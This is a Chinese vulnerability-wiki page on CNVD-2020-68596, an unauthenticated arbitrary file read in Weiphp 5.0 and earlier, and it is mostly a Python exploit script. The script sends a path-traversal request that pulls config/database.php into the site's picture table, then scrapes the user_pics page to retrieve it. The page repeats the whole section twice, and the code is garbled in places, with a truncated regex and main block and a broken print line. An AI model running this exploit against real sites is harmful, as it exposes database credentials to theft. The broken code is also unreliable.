CNVD-2020-68596_Weiphp5.0_前台文件任意讀取漏洞

# CNVD-2020-68596 Weiphp5.0 前台文件任意讀取漏洞

==漏洞影響==
Weiphp <= 5.0

==POC==

#!/usr/bin/python3
#-*- coding:utf-8 -*-
# author : PeiQi
# from   : http://wiki.peiqi.tech


import requests
import random
import re


def title():
    print('+------------------------------------------')
    print('+  \033[34mPOC_Des: http://wiki.peiqi.tech                                   \033[0m')
    print('+  \033[34mGithub : https://github.com/PeiQi0                                 \033[0m')
    print('+  \033[34m公众号 : PeiQi文库                                                \033[0m')                            \033[0m')
    print('+  \033[34mVersion: Weiphp5.0                                                \033[0m')
    print('+  \033[36m使用格式: python3 poc.py                                            \033[0m')
    print('+  \033[36mUrl    >>> http://xxx.xxx.xxx.xxx                                 \033[0m')
    print('+------------------------------------------')

def POC_1(target_url):
    upload_url = target_url + "/public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36"
    }
    data = {
        "1":1
    }
    try:
        response = requests.post(url=upload_url, headers=headers, data=data, timeout=20)
        if response.status_code == 200:
            print("\033[32m[o] 成功将 database.php文件 写入Pictrue表中\033[0m")
        else:
            print("\033[31m[x] 漏洞利用失败 \033[0m")
    except:
        print("\033[31m[x] 漏洞利用失败 \033[0m")

def POC_2(target_url):
    vnln_url = target_url + "/public/index.php/home/file/user_pics"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36"
    }
    try:
        response = requests.get(url=vnln_url, headers=headers).text
        href = re.findall(r'>> \033[0m"))
    POC_1(target_url)
    image_url = POC_2(target_url)
==參考==
http://wiki.peiqi.tech/PeiQi_Wiki/CMS%E6%BC%8F%E6%B4%9E/Weiphp/Weiphp5.0%20%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AF%BB%E5%8F%96%20CNVD-2020-68596.html

==漏洞影響==
Weiphp <= 5.0

==POC==

#!/usr/bin/python3
#-*- coding:utf-8 -*-
# author : PeiQi
# from   : http://wiki.peiqi.tech


import requests
import random
import re


def title():
    print('+------------------------------------------')
    print('+  \033[34mPOC_Des: http://wiki.peiqi.tech                                   \033[0m')
    print('+  \033[34mGithub : https://github.com/PeiQi0                                 \033[0m')
    print('+  \033[34m公众号 : PeiQi文库                                                \033[0m')                            \033[0m')
    print('+  \033[34mVersion: Weiphp5.0                                                \033[0m')
    print('+  \033[36m使用格式: python3 poc.py                                            \033[0m')
    print('+  \033[36mUrl    >>> http://xxx.xxx.xxx.xxx                                 \033[0m')
    print('+------------------------------------------')

def POC_1(target_url):
    upload_url = target_url + "/public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36"
    }
    data = {
        "1":1
    }
    try:
        response = requests.post(url=upload_url, headers=headers, data=data, timeout=20)
        if response.status_code == 200:
            print("\033[32m[o] 成功将 database.php文件 写入Pictrue表中\033[0m")
        else:
            print("\033[31m[x] 漏洞利用失败 \033[0m")
    except:
        print("\033[31m[x] 漏洞利用失败 \033[0m")

def POC_2(target_url):
    vnln_url = target_url + "/public/index.php/home/file/user_pics"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36"
    }
    try:
        response = requests.get(url=vnln_url, headers=headers).text
        href = re.findall(r'>> \033[0m"))
    POC_1(target_url)
    image_url = POC_2(target_url)
==參考==
http://wiki.peiqi.tech/PeiQi_Wiki/CMS%E6%BC%8F%E6%B4%9E/Weiphp/Weiphp5.0%20%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AF%BB%E5%8F%96%20CNVD-2020-68596.html

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容